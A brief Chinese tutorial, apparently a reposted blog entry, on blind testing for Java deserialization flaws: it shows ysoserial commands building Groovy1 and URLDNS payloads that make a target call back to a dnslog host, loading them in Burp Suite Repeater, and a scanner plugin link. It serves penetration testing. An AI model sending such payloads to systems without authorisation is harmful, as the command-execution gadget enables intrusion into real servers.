首页 > 编程语言 > 详细

java反序列化盲打与手工测试

时间:2020-01-10 13:00:07      阅读:95      评论:0      收藏:0      [点我收藏+]

1.生成测试payload:

cd D:\plug_in\BurpSuite JAVA反序列化漏洞扫描插件

//下面的语句意思就是反连到你自已的dnslog平台:

java -jar ./ysoserial-0.0.5.jar Groovy1 "ping t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org" > payload1.txt

 

java -jar ./ysoserial-0.0.6-SNAPSHOT-BETA-all.jar URLDNS http://t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org/ > payload1.txt

 技术分享图片

 

2.burpsuite中载入paload1.txt:

Repeater->右键选“Paste from file"

技术分享图片

   

//dnslog平台上面看结果:

技术分享图片

 3.burpsuite反序列化插件的测试截图:

下载地址:https://github.com/federicodotta/Java-Deserialization-Scanner/

技术分享图片

java反序列化盲打与手工测试

原文:https://www.cnblogs.com/pt007/p/12175507.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!